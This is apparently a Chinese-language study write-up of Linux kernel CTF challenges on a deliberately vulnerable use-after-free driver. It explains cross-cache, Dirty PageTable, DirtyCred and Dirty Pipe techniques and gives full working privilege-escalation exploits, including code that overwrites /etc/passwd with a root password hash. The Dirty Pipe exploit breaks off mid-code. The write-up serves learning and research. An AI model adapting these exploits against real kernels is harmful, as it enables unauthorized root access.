Speed Run r1rn kernel challenge note

Cross-Cache Attack

slub 相關的知識可以參考這
https://hackmd.io/@naup96321/BkeiK5Kexl

這邊簡單在介紹一次

我們可以知道，整個 OS 有相當多的 kmem_cache 這種 memory pool
他會嘗試去找對應大小 object 的 kmem_cache
其拿取的順序會從 kmem_cache_cpu 的 freelist，然後 active slab freelist，partial
然後去 kmem_cache_node partial
最後如果都沒有可用的，就會去 buddy system 分配 page 來用

analyze

他去創建了一個 device，裡面有定義一些 ioctl 這部分等等提到
之後去創建了一個 kmem_cache，其是一個大小為 0x200 obj 的結構體

#define OBJ_SIZE    0x200
struct obj {
    char buf[OBJ_SIZE];
};

static struct file_operations module_fops = {
    .unlocked_ioctl = module_ioctl,
};

static struct miscdevice vuln_dev = {
    .minor = MISC_DYNAMIC_MINOR,
    .name = "vuln",
    .fops = &module_fops
};

static int __init module_initialize(void) {
    if (misc_register(&vuln_dev) != 0) {
        return -1;
    }
    obj_cachep = KMEM_CACHE(obj, 0);
    if (!obj_cachep) {
        return -1;
    }
    return 0;
}

kernel module 定義了一些 ioctl
就是基本的 alloc、write、free


#define CMD_ALLOC   0xf000
#define CMD_WRITE   0xf001
#define CMD_FREE    0xf002

#define OBJ_MAX     0x200

typedef struct {
    int id;
    size_t size;
    char *data;
} request_t;

static long module_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
    request_t req;
    long ret;
    if (copy_from_user(&req, (void *)arg, sizeof(req)) != 0) {
        return -1;
    }
    if (req.id < 0 || req.id > OBJ_MAX - 1) {
        return -1;
    }
    mutex_lock(&module_lock);
    switch(cmd) {
        case CMD_ALLOC:
            ret = obj_alloc(req.id);
            break;
        case CMD_WRITE:
            ret = obj_write(req.id, req.data, req.size);
            break;
        case CMD_FREE:
            ret = obj_free(req.id);
            break;
        default:
            ret = -1;
            break;
    }
    mutex_unlock(&module_lock);
    return ret;
}

這份 kernel driver 仔細看有一個 UAF
他在 free objs array 中某個 pointer 指向的 object 沒有去清空 pointer，因此可以去操作已被釋放的 object

static struct obj *objs[OBJ_MAX];
static struct kmem_cache *obj_cachep;
static DEFINE_MUTEX(module_lock);

static long obj_alloc(int id) {
    if (objs[id] != NULL) {
        return -1;
    }
    objs[id] = kmem_cache_zalloc(obj_cachep, GFP_KERNEL);
    if (objs[id] == NULL) {
        return -1;
    }
    return 0;
}

static long obj_write(int id, char *data, size_t size) {
    if (objs[id] == NULL || size > OBJ_SIZE) {
        return -1;
    }
    if (copy_from_user(objs[id]->buf, data, size) != 0) {
        return -1;
    }
    return 0;
}

static long obj_free(int id) {
    kmem_cache_free(obj_cachep, objs[id]);
    return 0;
}

首先是因為我們 UAF 的 kmem_cache 是一個自己創建的，利用價值比起其他結構是比較低的，因此希望可以通過 cross cache 來去嘗試分配到其他結構體 UAF，達到控制 RIP、任意讀寫等

其核心概念就是讓有 UAF 的 object，跟著整個 slab 一起被 buddy system 回收，再去 spray 想要分配到的 struct，來將這塊 page 被其他 kmem_cache 拿去用

attack

來看題目文件

#!/bin/sh
qemu-system-x86_64 \
    -m 64M \
    -cpu qemu64 \
    -kernel bzImage \
    -drive file=rootfs.ext3,format=raw \
    -drive file=flag.txt,format=raw \
    -snapshot \
    -nographic \
    -monitor /dev/null \
    -no-reboot \
    -smp 1 \
    -append "root=/dev/sda rw init=/init console=ttyS0 nokaslr nopti loglevel=3 oops=panic panic=-1"

看起來是幾乎保護都沒有開
題目給了 ext3，將其掛載起來編寫內容

1 2	sudo mkdir /home/naup/Desktop/linux-kernel-exploitation/cross-cache-attack/sysfile sudo mount ./rootfs.ext3 /home/naup/Desktop/linux-kernel-exploitation/cross-cache-attack/sysfile

接下來可以去看這個檔案

~ # ls /sys/kernel/slab/obj
aliases            hwcache_align      partial            slabs
align              min_partial        poison             slabs_cpu_partial
cache_dma          object_size        reclaim_account    store_user
cpu_partial        objects            red_zone           total_objects
cpu_slabs          objects_partial    sanity_checks      trace
ctor               objs_per_slab      shrink             validate
destroy_by_rcu     order              slab_size

底下有很多很好用的資訊
objs_per_slab 代表一個 slab，有多少個 objects，這裡印出 8 ，代表有 8 個

另一個重要的是 cpu_partial
代表一個 CPU 本地可以去放置在 partial 中最大的 slab 數量
這邊印出來是 52

接下來我們來嘗試讓 UAF object 被 buddy system 回收

因此我們做一件事
先去分配 objs_per_slab * (cpu_partial + 1) 個
之後再分配一個 object 來去刷新 active object
確保整個 active slab 是我們可控制的
接下來我們有 objs_per_slab * (cpu_partial + 1) 個 full slab
接下來關注一件事，當 partial 滿的時候，他會去嘗試刷新整個 partial
其中所有 object 都被釋放狀態的 slab 會被 buddy system 回收
這裡的 slab 是一個 1 page 的 slab，也就是會進入 order 0 (0x200 * 8 = 1 page = 4kb)
但是如果讓連續的 page 被回收的話，會被 buddy system 合併到更高 order 的地方
讓我們 UAF page 被低 order slab 分配的機率下降
因此我們去釋放不連續的 page
讓雙數的 page 所有的 object 被 free 掉
單數的只 free 掉一塊

這樣在 partial 滿的狀態時候，他只會去把所有都 free 掉的回收

PS: 不是 page 被回收後都會進入到 buddy system freelist 中
buddy system 會維護以 page 為單位的記憶體分配，但根據需求的不同，上層子系統可能會請求 order-0、order-1 等不同大小的連續記憶體。為了處理碎片化，buddy system 內部會使用一個 PCP (per-cpu-page) 的結構做 page-level caching。這個結構有幾個特色：
每個 CPU 都會有一個
共有 14 個 list 來維護 cached page，分別是 4 種大小 (order-{0,1,2,3}) 乘以 3 種 migrate type (unmovable, movable, reclaimable) 共 12 種，再加上 THP (一種特別的 huge page 型態) 2 種

在釋放 (slab) cache 時，PCP 會先判斷該塊記憶體是否在 order 0 ~ 3 的範圍，如果是的話，就會先被 cache 到對應的 PCP list 內。反之亦然，請求 page 時也會先看 PCP list 是否有 page 可以用。

可以想像 cache 機制不會維護太多 page，所以當 page 超過一定的數量 (threshold) 時，就會真正的回到 buddy system。太少也會先從 buddy system 拿一些來用。

從這邊其實可以很清楚的觀察到這件事
https://elixir.bootlin.com/linux/v6.16/source/mm/page_alloc.c#L2692

去觀察 /proc/zoneinfo 也是個方法

void show_zoneinfo()
{
    FILE *fp = fopen("/proc/zoneinfo", "r");
    char line[256];
    int in_pagesets = 0;
    int current_cpu = -1;

    while (fgets(line, sizeof(line), fp)) {
        if (strstr(line, "pagesets")) {
            in_pagesets = 1;
            continue;
        }

        if (in_pagesets && line[0] != ' ' && line[0] != '\t') {
            in_pagesets = 0;
            continue;
        }

        if (in_pagesets) {
            int cpu_id;
            if (sscanf(line, " cpu: %d", &cpu_id) == 1) {
                current_cpu = cpu_id;
            }

            int count_val;
            if (sscanf(line, " count: %d", &count_val) == 1 && current_cpu != -1) {
                printf("CPU %d -> count = %d\n", current_cpu, count_val);
            }
        }
    }

    fclose(fp);
}

之後去 UAF 寫掉雙數的 object 第一塊
這樣就有大機率寫掉 seq
反正沒開 SMEP SMAP
控制執行流程後直接跳回 Userspace 跑 commit_cred(init_cred)

exploit

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <time.h>
#include <assert.h>
#include <stdint.h>
#include <sched.h>
#include <unistd.h>

// gcc exploit.c -o exploit --static -masm=intel

#define CMD_ALLOC   0xf000
#define CMD_WRITE   0xf001
#define CMD_FREE    0xf002

typedef struct {
    int id;
    size_t size;
    char *data;
} request_t;

int fd;

void obj_alloc(int id) {
    request_t req = {
        .id = id
    };
    ioctl(fd, CMD_ALLOC, &req);
}

void obj_write(int id, size_t size, char* data) {
    request_t req = {
        .id = id,
        .size = size,
        .data = data
    };
    ioctl(fd, CMD_WRITE, &req);

}

void obj_free(int id) {
    request_t req = {
        .id = id
    };

    ioctl(fd, CMD_FREE, &req);
}

unsigned long user_cs, user_ss, user_rsp, user_rflags;

void save_state() {
    asm volatile (
        "movq %0, cs\n"
        "movq %1, ss\n"
        "movq %2, rsp\n"
        "pushfq\n"
        "popq %3\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rsp), "=r"(user_rflags)
        : 
        : "memory"
    );
}

void win() {
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
}

void restore_state() {
    asm volatile(
        "swapgs\n"
        "movq [rsp + 0x00], %0\n"
        "movq [rsp + 0x08], %1\n"
        "movq [rsp + 0x10], %2\n"
        "movq [rsp + 0x18], %3\n"
        "movq [rsp + 0x20], %4\n"
        "iretq\n"
        :
        : "r"(win), "r"(user_cs), "r"(user_rflags), "r"(user_rsp), "r"(user_ss)
    );
}



#define addr_init_cred      0xffffffff81e3cbc0
#define addr_commit_creds   0xffffffff8109f980

void escalate_privilege() {
    __asm__ volatile (
        "mov rdi, %[init_cred]\n\t"
        "mov rax, %[commit]\n\t"
        "call rax\n\t"
        :
        : [init_cred] "r" (addr_init_cred),
          [commit] "r" (addr_commit_creds)
        : "rax", "rdi"
    );
    restore_state();
}

int main(){
    save_state();
    fd = open("/dev/vuln", O_RDONLY);
    if (fd == -1){
        puts("Open /dev/vuln failed");
    }

    int obj_per_slab = 8;
    int cpu_partial = 52;
    int spray_obj_num = obj_per_slab * (cpu_partial + 1);

    puts("allocate obj_per_slab * (cpu_partial + 1) slabs");
    for (int i = 0; i < spray_obj_num; i++){
        obj_alloc(i);
    }

    puts("create one new active slab");
    obj_alloc(spray_obj_num);

    puts("Freeing objects to release order-0 pages back to the buddy allocator");
    for (int i = 0; i < spray_obj_num; i += obj_per_slab) {
        if (i % (obj_per_slab * 2) == 0) {
            for (int j = i; j < i + obj_per_slab; j++) {
                obj_free(j);
            }
        } else {
            obj_free(i);
        }
    }

    puts("Spraying struct seq_operations to reclaim order-0 pages");
    int seqfds[0x20];
    for (int i = 0; i < 0x20; i++) {
        seqfds[i] = open("/proc/self/stat", O_RDONLY);
        assert(seqfds[i] >= 0);
    }
    
    puts("Hijacking RIP");
    char payload[0x8];
    *(unsigned long *)&payload = (unsigned long)escalate_privilege;

    for (int i = 0; i < spray_obj_num; i += obj_per_slab) {
        if (i % (obj_per_slab * 2) == 0) {
            obj_write(i, 0x8, payload);
        }
    }
    
    for (int i = 0; i < 0x20; i++) {
        read(seqfds[i], payload, 1);
    }
}

Dirty PageTable

analyze

基本上跟第一題一樣

static long obj_alloc(int id) {
    if (objs[id] != NULL) {
        return -1;
    }
    objs[id] = kmem_cache_zalloc(obj_cachep, GFP_KERNEL);
    if (objs[id] == NULL) {
        return -1;
    }
    return 0;
}

static long obj_read(int id, char *data, size_t size) {
    if (objs[id] == NULL || size > OBJ_SIZE) {
        return -1;
    }
    if (copy_to_user(data, objs[id]->buf, size) != 0) {
        return -1;
    }
    return 0;
}

static long obj_write(int id, char *data, size_t size) {
    if (objs[id] == NULL || size > OBJ_SIZE) {
        return -1;
    }
    if (copy_from_user(objs[id]->buf, data, size) != 0) {
        return -1;
    }
    return 0;
}

static long obj_free(int id) {
    kmem_cache_free(obj_cachep, objs[id]);
    return 0;
}

不過多了一個 obj_read 可以用
並且啟動參數把 SMAP SMEP KASLR 都打開了

#!/bin/sh
qemu-system-x86_64 \
    -m 64M \
    -cpu qemu64,+smap,+smep \
    -kernel bzImage \
    -drive file=rootfs.ext3,format=raw \
    -drive file=flag.txt,format=raw \
    -snapshot \
    -nographic \
    -monitor /dev/null \
    -no-reboot \
    -smp 1 \
    -append "root=/dev/sda rw init=/init console=ttyS0 kaslr pti=on loglevel=3 oops=panic panic=-1"

attack

首先是因為打開 SMEP SMAP 所以無法簡單的通過 control rip
來跳到 userspace 的 code 來去提權

所以這邊使用一個 data only 方式來打
通過去 spray mapping 產生的 PTE struct 來 cross cacch 去複寫

這個結構上的第二個 bits 是管理 R/W 權限的
當我們去 mapping 到 /etc/passwd 想要去複寫的時候，因為原本只有可讀所以無法改寫
但是通過 UAF 寫掉 R/W 位就可以改變權限讓 /etc/passwd 可寫
去改寫密碼來提權 openssl passwd -1 -salt naup naup96321

exploit

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <time.h>
#include <assert.h>
#include <stdint.h>
#include <sched.h>
#include <unistd.h>
#include <sys/mman.h> 

// gcc exploit.c -o exploit --static -masm=intel

#define CMD_ALLOC   0xf000
#define CMD_READ    0xf001
#define CMD_WRITE   0xf002
#define CMD_FREE    0xf003

typedef struct {
    int id;
    size_t size;
    char *data;
} request_t;

int fd;
int etcpasswd_fd;

void obj_alloc(int id) {
    request_t req = {
        .id = id
    };
    ioctl(fd, CMD_ALLOC, &req);
}

void obj_write(int id, size_t size, char* data) {
    request_t req = {
        .id = id,
        .size = size,
        .data = data
    };
    ioctl(fd, CMD_WRITE, &req);

}

void obj_read(int id, size_t size, char* data) {
    request_t req = {
        .id = id,
        .size = size,
        .data = data
    };
    
    ioctl(fd, CMD_READ, &req);
}

void obj_free(int id) {
    request_t req = {
        .id = id
    };

    ioctl(fd, CMD_FREE, &req);
}

#define PAGE_SIZE 0x200000UL
#define MMAPING_BASE 0x777000000000UL

int main(){
    
    fd = open("/dev/vuln", O_RDONLY);
    if (fd == -1){
        puts("Open /dev/vuln failed");
    }

    int obj_per_slab = 8;
    int cpu_partial = 52;
    int spray_obj_num = obj_per_slab * (cpu_partial + 1);

    puts("allocate obj_per_slab * (cpu_partial + 1) slabs");
    for (int i = 0; i < spray_obj_num; i++){
        obj_alloc(i);
    }

    puts("create one new active slab");
    obj_alloc(spray_obj_num);

    puts("Freeing objects to release order-0 pages back to the buddy allocator");
    for (int i = 0; i < spray_obj_num; i += obj_per_slab) {
        if (i % (obj_per_slab * 2) == 0) {
            for (int j = i; j < i + obj_per_slab; j++) {
                obj_free(j);
            }
        } else {
            obj_free(i);
        }
    }

    etcpasswd_fd = open("/etc/passwd", O_RDONLY);
    if (etcpasswd_fd == -1) {
        puts("Open /etc/passwd failed");
    }

    puts("Spraying mmaping");
    int mapping_spraying_num = 0x20;
    for (int i = 0 ; i < mapping_spraying_num; i++) {
        void *map = mmap((void*)MMAPING_BASE + PAGE_SIZE * i, 0x1000, PROT_READ, MAP_PRIVATE, etcpasswd_fd, 0);
        if (map == MAP_FAILED) {
            puts("Error mapping");
        }
        volatile char first_byte = ((char*)map)[0];
        (void)first_byte; 
    }



    int victim = -1;
    unsigned int pte = 0;
    for (int i = 0; i < mapping_spraying_num; i+= obj_per_slab*2) {
        obj_read(i, 8, (char*)&pte);
        if (pte != 0) {
            victim = i;
            pte |= 0x2;
            obj_write(victim, 8, (char*)&pte);
            break;
        }
    }

    if (victim == -1) {
        puts("Failed to find evil PTE");
    }

    puts("Preparing malicious passwd content");
    system("echo 'root:$1$naup$tZAttOyVXnz7BlRCnYsuv/:0:0:root:/root:/bin/sh' > /tmp/evil");
    int evil_fd = open("/tmp/evil", O_RDONLY);
    if (evil_fd == -1) {
        perror("open /tmp/evil");
        return 1;
    }

    struct stat st;
    if (fstat(evil_fd, &st) == -1) {
        perror("fstat /tmp/evil");
        close(evil_fd);
        return 1;
    }

    puts("Overwriting /etc/passwd via writable mmap");
    int success = 0;
    for (int i = 0; i < mapping_spraying_num; i++) {
        void *addr = (void *)(MMAPING_BASE + PAGE_SIZE * i);
        ssize_t wrote = pread(evil_fd, addr, st.st_size, 0);
        if (wrote == st.st_size) {
            printf("Overwrite success at %#lx\n", (unsigned long)addr);
            success = 1;
            break;
        }
    }
    close(evil_fd);

    if (!success) {
        puts("Failed to overwrite /etc/passwd");
        return 1;
    }

    puts("Exploit done! You can now login as root with password 'naup96321'");

    return 0;
}

/*
~ $ su
Password: 
/ # id
uid=0(root) gid=0(root) groups=0(root)
*/

Dirty Cred

analyze

driver 功能變這樣

#define CMD_ALLOC   0xf000
#define CMD_READ    0xf001
#define CMD_FREE    0xf002

static long obj_alloc(int id) {
    if (objs[id] != NULL) {
        return -1;
    }
    objs[id] = kmem_cache_zalloc(obj_cachep, GFP_KERNEL);
    if (objs[id] == NULL) {
        return -1;
    }
    return 0;
}

static long obj_read(int id, char *data, size_t size) {
    if (objs[id] == NULL || size > OBJ_SIZE) {
        return -1;
    }
    if (copy_to_user(data, objs[id]->buf, size) != 0) {
        return -1;
    }
    return 0;
}

static long obj_free(int id) {
    kfree(objs[id]);
    return 0;
}

沒有 write 功能了
保護一樣是全開的狀態

#!/bin/sh
qemu-system-x86_64 \
    -m 64M \
    -cpu qemu64,+smap,+smep \
    -kernel bzImage \
    -drive file=rootfs.ext3,format=raw \
    -drive file=flag.txt,format=raw \
    -snapshot \
    -nographic \
    -monitor /dev/null \
    -no-reboot \
    -smp 1 \
    -append "root=/dev/sda rw init=/init console=ttyS0 kaslr pti=on loglevel=3 oops=panic panic=-1"

attack

slab 一些東西不太一樣
稍微修改一下

在沒有辦法寫的狀況下，或許可以考慮做 dirty cred

現在有一個想法
如果我們可以 UAF cred 這個 struct
然後 spray，讓我們有一個自己低權限的 proecess UAF 後
去 free UAF 低權限的 process

之後再去 spary 高權限 process
來讓 cred 被拿走後被寫入高權限的資訊來提權我們可控的低權限 process

不過去 spray process 的 noise 非常多
但有方法可以降低這個 noise
可以參考這篇，通過設定一些 flags 可以大量去降低 noise
clone(CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND)
https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html

exploit

exploit 穩定度好低，但是可以成功讀出 flag
可以在看怎麼提升穩定度

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <stdatomic.h>
#include <assert.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <sched.h>
#include <string.h>
#include <signal.h>

// gcc exploit.c -o exploit --static -masm=intel

#define CMD_ALLOC   0xf000
#define CMD_READ    0xf001
#define CMD_FREE    0xf002

typedef struct {
    int id;
    size_t size;
    char *data;
} request_t;

int fd;

void obj_alloc(int id) {
    request_t req = {.id = id};
    assert(ioctl(fd, CMD_ALLOC, &req) == 0);
}

void obj_read(int id, char *data, size_t size) {
    request_t req = {.id = id, .size = size, .data = data};
    assert(ioctl(fd, CMD_READ, &req) == 0);
}

void obj_free(int id) {
    request_t req = {.id = id};
    assert(ioctl(fd, CMD_FREE, &req) == 0);
}

#define NUM_CRED_SPRAY      0x50
#define NUM_ROOT_CRED_SPRAY 0x50

struct cred {
    unsigned long usage;
    int uid;
    int gid;
    int suid;
    int sgid;
    int euid;
    int egid;
    int fsuid;
    int fsgid;
};

atomic_bool try = false;
atomic_bool win = false;
atomic_int failed = 0;

int child_func(void *arg) {
    char flag[0x10] = {};
    int fd;
    
    while(atomic_load(&try) != true) {
        sleep(1);
    }

    if (geteuid() == 0) {
        fd = open("/dev/sdb", O_RDONLY);
        if (fd == -1) {
            exit(0);
        }
        if (read(fd, flag, 0x10) == -1){
            exit(0);
        }
        printf("[+] Flag: %s\n", flag);
    
        atomic_store(&win, true);
        exit(0);
    } else {
        atomic_fetch_add(&failed, 1);
        exit(0);
    }
}

int main() {
    fd = open("/dev/vuln", O_RDONLY);
    assert(fd != -1);

    // Get slab information
    int objs_per_slab = 21;
    int cpu_partial = 120;
    int num_spray = objs_per_slab * (cpu_partial + 1);

    printf("[*] Allocating %d objects to fill partial list\n", num_spray);
    for (int i = 0; i < num_spray; i++) {
        obj_alloc(i);
    }

    puts("[*] Creating one new active slab");
    obj_alloc(num_spray);

    puts("[*] Freeing objects to release order-0 pages back to buddy allocator");
    for (int i = 0; i < num_spray; i += objs_per_slab) {
        if (i % (objs_per_slab * 2) == 0) {
            for (int j = i; j < i + objs_per_slab; j++) {
                obj_free(j);
            }
        } else {
            obj_free(i);
        }
    }

    char stack[NUM_CRED_SPRAY][0x1000];
    for (int i = 0; i < NUM_CRED_SPRAY; i++) {
        void *stack_top = stack[i] + 0x1000 - 1;
        int flags = CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND | SIGCHLD;
        assert(clone(child_func, stack_top, flags, NULL) != -1);
    }

    puts("[*] Searching for victim objects");
    int victim = -1;
    struct cred cred = {};
    for (int i = 0; i < num_spray; i += objs_per_slab * 2) {
        for (int j = i; j < i + objs_per_slab; j++) {
            obj_read(j, (char *)&cred, sizeof(cred));
            if (cred.uid == getuid() && cred.euid == geteuid()) {
                victim = j;
                printf("[+] Found victim object at id %d\n", victim);
                obj_free(victim);
            }
        }
    }

    if (victim == -1) {
        puts("[-] Failed to find victim object");
        exit(1);
    }

    puts("[*] Spraying root credentials");
    for (int i = 0; i < NUM_ROOT_CRED_SPRAY; i++) {
        pid_t pid = fork();
        if (pid == 0) {
            char *argv[] = {"/bin/su", NULL};
            execve(argv[0], argv, NULL);
            exit(1);
        }
    }

    sleep(1);
    puts("[*] Triggering privilege escalation");
    atomic_store(&try, true);

    while(1) {
        if (atomic_load(&win) == true) {
            exit(0);
        }
        if (atomic_load(&failed) == NUM_CRED_SPRAY) {
            puts("[-] Exploit failed");
            exit(1);
        }
        sleep(1);
    }

    return 0;
}

Dirty pipe

analyze

基本上跟上一題一樣
不過所有功能都有
不過他使用了

static long obj_alloc(void) {
    if (obj != NULL) {
        return -1;
    }
    obj = kzalloc(sizeof(struct obj), GFP_KERNEL);
    if (obj == NULL) {
        return -1;
    }
    return 0;
}

所以現在有一個 general cache kmalloc-1k 的 kmem_cache UAF

pipe

可以嘗試 dirty pipe
先來介紹一下
pipe 是用於不同 process 之間通訊的一個東西

kernel 會創建一個 inode
並分配兩個 file descriptor 來去做為讀端及寫端

pipe_inode_info 存放著該 pipe 的 metadata
pipe_buffer 是用來存放 pipe 實際上傳遞的資料

https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L86

/**
 *	struct pipe_inode_info - a linux kernel pipe
 *	@mutex: mutex protecting the whole thing
 *	@rd_wait: reader wait point in case of empty pipe
 *	@wr_wait: writer wait point in case of full pipe
 *	@head: The point of buffer production
 *	@tail: The point of buffer consumption
 *	@head_tail: unsigned long union of @head and @tail
 *	@note_loss: The next read() should insert a data-lost message
 *	@max_usage: The maximum number of slots that may be used in the ring
 *	@ring_size: total number of buffers (should be a power of 2)
 *	@nr_accounted: The amount this pipe accounts for in user->pipe_bufs
 *	@tmp_page: cached released page
 *	@readers: number of current readers of this pipe
 *	@writers: number of current writers of this pipe
 *	@files: number of struct file referring this pipe (protected by ->i_lock)
 *	@r_counter: reader counter
 *	@w_counter: writer counter
 *	@poll_usage: is this pipe used for epoll, which has crazy wakeups?
 *	@fasync_readers: reader side fasync
 *	@fasync_writers: writer side fasync
 *	@bufs: the circular array of pipe buffers
 *	@user: the user who created this pipe
 *	@watch_queue: If this pipe is a watch_queue, this is the stuff for that
 **/
struct pipe_inode_info {
	struct mutex mutex;
	wait_queue_head_t rd_wait, wr_wait;

	/* This has to match the 'union pipe_index' above */
	union {
		unsigned long head_tail;
		struct {
			pipe_index_t head;
			pipe_index_t tail;
		};
	};

	unsigned int max_usage;
	unsigned int ring_size;
	unsigned int nr_accounted;
	unsigned int readers;
	unsigned int writers;
	unsigned int files;
	unsigned int r_counter;
	unsigned int w_counter;
	bool poll_usage;
#ifdef CONFIG_WATCH_QUEUE
	bool note_loss;
#endif
	struct page *tmp_page[2];
	struct fasync_struct *fasync_readers;
	struct fasync_struct *fasync_writers;
	struct pipe_buffer *bufs;
	struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
	struct watch_queue *watch_queue;
#endif
};

head: 下一個寫入位置
tail: 下一個讀取位置
rd_wait / wr_wait
- 當 pipe 為空時，讀端進入 rd_wait 等待
- 當 pipe 為滿時，寫端進入 wr_wait 等待
max_usage: ring buffer 可使用的最大 buffer 數
readers / writers: 當前活躍的讀端與寫端數量
files: 有多少個 struct file 引用這個 pipe（受 ->i_lock 保護）
r_counter / w_counter: 計數器，追蹤端點操作，主要用於判斷狀態變化與喚醒邏輯
poll_usage: 表示此 pipe 是否用於 epoll（因為 epoll 會造成更頻繁的 wakeup，需要特殊處理）
tmp_page: 暫存釋放掉的 page
bufs: 指向真正的環形緩衝區

https://elixir.bootlin.com/linux/v6.15.9/source/include/linux/pipe_fs_i.h#L26

/**
 *	struct pipe_buffer - a linux kernel pipe buffer
 *	@page: the page containing the data for the pipe buffer
 *	@offset: offset of data inside the @page
 *	@len: length of data inside the @page
 *	@ops: operations associated with this buffer. See @pipe_buf_operations.
 *	@flags: pipe buffer flags. See above.
 *	@private: private data owned by the ops.
 **/
struct pipe_buffer {
	struct page *page;
	unsigned int offset, len;
	const struct pipe_buf_operations *ops;
	unsigned int flags;
	unsigned long private;
};

pipe_buffer 就是用來存資料的地方，每個 pipe 管理了一些 page 來存

這部分 read write 實作先不下 source code
先來看概念

https://bbs.kanxue.com/thread-286449.html

整個結構長這樣

剛剛提到
head 是一個寫入 pointer
tail 是一個讀取 pointer

pipe inode metadata 中的 bufs pointer 就管理了一個 0x10 個 pipe_buffer (使用上像是環形的)
並且有兩種狀態
緩衝區空：當 head == tail
表示沒有數據可讀，寫指標追上讀指標了，管道中沒有有效數據。

緩衝區滿：當 (head - tail) == N
表示寫指標比讀指標快 N 個緩衝槽位，管道已寫滿，不能再寫入數據，寫入方需要阻塞等待。

pipe_write (寫入東西到 pipe_buffer)
- 通過 head & mask 來去找到當前要寫入的 page
- 第一次寫入設定 bufs[i]->flags 被設置成 PIPE_BUF_FLAG_CAN_MERGE 或是 PIPE_BUF_FLAG_PACKET (網路封包)
- copy_page_from_iter 被 call，將 userspace 想傳的資料暫存在 kernel space 的 pipe_buffer 中
- 更新 head 到下一個 page
pipe_read (讀取東西到 userspace，另一個 process)
- 通過 tail & mask 來去找到當前要讀取的 page
- copy_page_from_iter 被 call，將資料從該 page 的 buf->offset 開始 copy，並更新 buf->offset 和 buf->len (offset 是從哪裡開始讀，len 是讀多長)
- 更新 tail 到下一個 page
- 若緩衝區為空，就代表沒事了

稍微 demo 一下用法大概長這樣

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>

int main() {
    int pipefd1[2]; // 第一個 pipe
    int pipefd2[2]; // 第二個 pipe

    if (pipe(pipefd1) == -1) {
        perror("pipe1");
        return 1;
    }

    if (pipe(pipefd2) == -1) {
        perror("pipe2");
        return 1;
    }

    const char *msg = "Rana is so cute!\n";

    
    write(pipefd1[1], msg, strlen(msg));

    // pipe fd1 read --> pipe fd2 write
    ssize_t n = splice(pipefd1[0], NULL, pipefd2[1], NULL, strlen(msg), SPLICE_F_MOVE | SPLICE_F_MORE);
    if (n == -1) {
        perror("splice");
        return 1;
    }
    printf("splice moved %zd bytes\n", n);

    char buf[100] = {0};

    // read pipe fd2 write data to buf
    ssize_t r = read(pipefd2[0], buf, sizeof(buf) - 1);
    if (r == -1) {
        perror("read");
        return 1;
    }

    printf("read from pipe2: %s", buf);

    close(pipefd1[0]);
    close(pipefd1[1]);
    close(pipefd2[0]);
    close(pipefd2[1]);

    return 0;
}

attack

如果有開啟 PIPE_BUF_FLAG_CAN_MERGE 可以在不超過一個 page 的狀況下，繼續去續寫 page
但如果我們去改寫 flags 成這樣然後把 len 改成 0 (offset 大概都是 0)
來讓 kernel pipe 誤認為該段可以追加寫入，可以寫入 /etc/passwd

可以看這段沒有去驗證當前權限直接將東西寫入

if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
    offset + chars <= PAGE_SIZE) {
	ret = pipe_buf_confirm(pipe, buf);
	if (ret)
		goto out;

	ret = copy_page_from_iter(buf->page, offset, chars, from);
	if (unlikely(ret < chars)) {
		ret = -EFAULT;
		goto out;
	}

	buf->len += ret;
	if (!iov_iter_count(from))
		goto out;
}

總結一句話，若你是直接對 file 做寫入那就是會去驗證檔案權驗
但是因為 flags 被改，誤認為這是追加寫入，讓我們可以去寫入 pipe_buffer
他會被映射到對應的 page 上(沒有檢查) 來做到任意寫入檔案

Dirty pipe 也可以看這個
https://dirtypipe.cm4all.com/

https://u1f383.github.io/linux/2024/08/16/linux-kernel-use-pipe-object-to-do-data-only-attack.html

exploit

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <time.h>
#include <assert.h>
#include <stdint.h>
#include <sched.h>
#include <unistd.h>
#include <sys/mman.h> 

// gcc exploit.c -o exploit --static -masm=intel

#define CMD_ALLOC   0xf000
#define CMD_READ    0xf001
#define CMD_WRITE   0xf002
#define CMD_FREE    0xf003

typedef struct {
    size_t size;
    char *data;
} request_t;

int fd;
int etcpasswd_fd;

void obj_alloc() {
    request_t req = {};
    ioctl(fd, CMD_ALLOC, &req);
}

void obj_write(size_t size, char* data) {
    request_t req = {
        .size = size,
        .data = data
    };
    ioctl(fd, CMD_WRITE, &req);

}

void obj_read(size_t size, char* data) {
    request_t req = {
        .size = size,
        .data = data
    };
    
    ioctl(fd, CMD_READ, &req);
}

void obj_free() {
    request_t req = {};

    ioctl(fd, CMD_FREE, &req);
}

void show_zoneinfo()
{
    FILE *fp = fopen("/proc/zoneinfo", "r");
    char line[256];
    int in_pagesets = 0;
    int current_cpu = -1;

    while (fgets(line, sizeof(line), fp)) {
        if (strstr(line, "pagesets")) {
            in_pagesets = 1;
            continue;
        }

        if (in_pagesets && line[0] != ' ' && line[0] != '\t') {
            in_pagesets = 0;
            continue;
        }

        if (in_pagesets) {
            int cpu_id;
            if (sscanf(line, " cpu: %d", &cpu_id) == 1) {
                current_cpu = cpu_id;
            }

            int count_val;
            if (sscanf(line, " count: %d", &count_val) == 1 && current_cpu != -1) {
                printf("CPU %d -> count = %d\n", current_cpu, count_val);
            }
        }
    }

    fclose(fp);
}

struct pipe_buffer {
    void *page;    
    unsigned int offset;
    unsigned int len;
